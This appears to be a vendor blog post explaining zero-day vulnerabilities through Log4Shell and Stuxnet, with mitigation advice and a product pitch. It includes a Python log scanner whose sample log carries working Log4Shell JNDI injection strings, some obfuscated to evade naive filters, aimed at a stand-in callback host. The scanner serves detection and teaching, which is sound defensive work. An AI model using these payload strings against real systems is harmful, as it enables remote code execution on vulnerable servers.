A zero-day is a vulnerability that an adversary discovers and uses before the vendor or the wider community knows it exists, and it is especially dangerous for organizations that run the affected software. Once exploited, a zero-day can cripple the victim until the flaw is identified and a fix or mitigation is available. Because no patch, signature, or advisory exists before the first attacks are observed, defenders are limited to generic controls during that window, which is why a threat actor who finds a zero-day can cause damage across an entire industry.
Eight months ago, a zero-day in Log4j sent security teams scrambling around the globe. Log4j is a logging library used in a huge number of Java applications, and the vulnerability, CVE-2021-44228, also known as Log4Shell, allowed remote code execution: an attacker who could get a crafted JNDI lookup string into any field the application logged (an HTTP User-Agent header, a username, a search term) could make the vulnerable host fetch and run attacker-supplied code. Log4Shell's impact came from the library's ubiquity across services, websites, and applications in many industries, including resources, communications, media, technology, financial services, health, and public service. In its report released on July 11, the Cyber Safety Review Board (CSRB) labeled Log4j an "endemic vulnerability", meaning that vulnerable instances are expected to linger for years or even decades.
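Because Log4Shell rides on ordinary request data, the first signal most teams had was probe strings in their web server logs, and attackers quickly started obfuscating the lookup with nested `${lower:...}`, `${upper:...}` and `${...:-default}` expressions that Log4j itself would unwrap before the JNDI lookup ran. The scanner below is an added example (it is not Conceal's code and is not part of the original article) showing how a detection rule can normalize those tricks the way Log4j's string substitution would, then flag the lookup and pull out the callback host. The access-log lines, the `203.0.113.7` address, and the `scan`, `normalize` and `resolve_lookups` function names are all constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (combined-log style). Lines 2-4 carry Log4Shell probes in
# increasingly obfuscated forms; line 5 contains a harmless ${...} placeholder that a naive
# "${" rule would flag as a false positive.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/a}"',
    '10.0.0.12 - - [10/Dec/2021:13:02:00 +0000] "GET /docs/${project.version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# Innermost ${...} expression (no nested braces or '$' inside the body).
INNER = re.compile(r'\$\{([^${}]*)\}')
# Any JNDI lookup, used for the verdict.
JNDI_ANY = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
# JNDI lookup with a URL scheme, used to extract the attacker's callback host.
JNDI_URL = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)', re.IGNORECASE)


def resolve_lookups(s: str, max_rounds: int = 20) -> str:
    """Unwrap the obfuscating lookups commonly seen in Log4Shell payloads, innermost first,
    mimicking Log4j 2's StrSubstitutor: ${lower:X} -> x, ${upper:X} -> X, and the default-value
    form ${key:-X} -> X (so ${::-j} -> j and ${env:NaN:-j} -> j). Any other lookup, including
    ${jndi:...} itself, is left in place so the detector can see it. This covers the common
    tricks, not every Log4j lookup type."""
    def unwrap(m):
        body = m.group(1)
        if ':-' in body:                       # ${anything:-default} resolves to the default
            return body.partition(':-')[2]
        prefix, sep, arg = body.partition(':')
        if sep and prefix.lower() == 'lower':
            return arg.lower()
        if sep and prefix.lower() == 'upper':
            return arg.upper()
        return m.group(0)                      # unknown lookup: keep verbatim
    for _ in range(max_rounds):
        new = INNER.sub(unwrap, s)
        if new == s:
            break
        s = new
    return s


def normalize(line: str) -> str:
    """URL-decode twice (probes are often double-encoded in the request line), then resolve
    the obfuscating lookups so the JNDI expression appears in canonical form."""
    decoded = line
    for _ in range(2):
        decoded = unquote(decoded)
    return resolve_lookups(decoded)


def scan(lines):
    """Return one hit per line containing a JNDI lookup after normalization. Each hit records
    the 1-based line number, the lookup scheme (ldap, rmi, dns, ...), and the callback target,
    which is the indicator you would block and hunt for across other telemetry."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI_ANY.search(norm):
            m = JNDI_URL.search(norm)
            hits.append({
                'line': number,
                'scheme': m.group(1).lower() if m else None,
                'target': m.group(2) if m else None,
            })
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_ACCESS_LOG):
        print(f"line {hit['line']}: jndi {hit['scheme']} -> {hit['target']}")
```

Running it on the constructed log flags lines 2, 3 and 4 and extracts `203.0.113.7` (with port `1389` on line 2) as the callback host, while the `${project.version}` placeholder on line 5 is left alone. A hit in a log only tells you that someone probed; whether the host was actually vulnerable is a separate question answered by the dependency inventory and by outbound connection logs to the extracted target.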
In June 2010, the Stuxnet worm was discovered. It had been built to sabotage industrial control systems at Iran's uranium enrichment facility and exploited several previously unknown Windows vulnerabilities to spread. Often called the first digital weapon, Stuxnet was the first known malware to physically destroy equipment controlled by computers, and the world quickly realized that viruses and worms were not limited to damaging computers or stealing information. Although it was aimed at one Iranian plant, the worm spread well beyond Iran and infected other industrial and energy-producing systems.
Complete prevention of a zero-day attack is impossible. By definition the weakness is unknown to everyone but the attacker, and a security team cannot write a specific fix or signature for something it does not know exists. Even so, several best practices limit how far a zero-day can get and how much damage it does. Patch management comes first: it cannot close an unknown flaw, but it removes the known vulnerabilities an attacker chains together with a zero-day, and knowing exactly which software runs where is the same inventory you will need on the day a Log4Shell-style disclosure lands. Reducing exposed software, such as unneeded services and unused dependencies, shrinks what a zero-day can reach. Behavior-based detection (next-generation antivirus or EDR) that flags suspicious activity such as a logging process spawning a shell or making unexpected outbound connections, rather than only matching known malware, gives a chance to catch exploitation of a flaw no one has named yet. Arguably more important than preventing a zero-day is responding to one well: a rehearsed incident response plan that guides containment, eradication, and recovery minimizes the attack's impact and lets the organization control the public narrative around the event.
At Conceal, we help organizations mitigate the risk created by vulnerabilities and improve cyber hygiene. Through ConcealCloud, organizations can shield vulnerable systems and applications from attacks arriving over the internet, including zero-day exploitation. The zero-trust hosting and access that ConcealCloud provides adds an extra layer between the organization's network and the internet. By removing direct internet access to infrastructure, ConcealCloud takes away the attacker's ability to reach and remotely exploit critical flaws in that infrastructure from the internet; it is a layer of defense alongside patching and detection, not a replacement for them.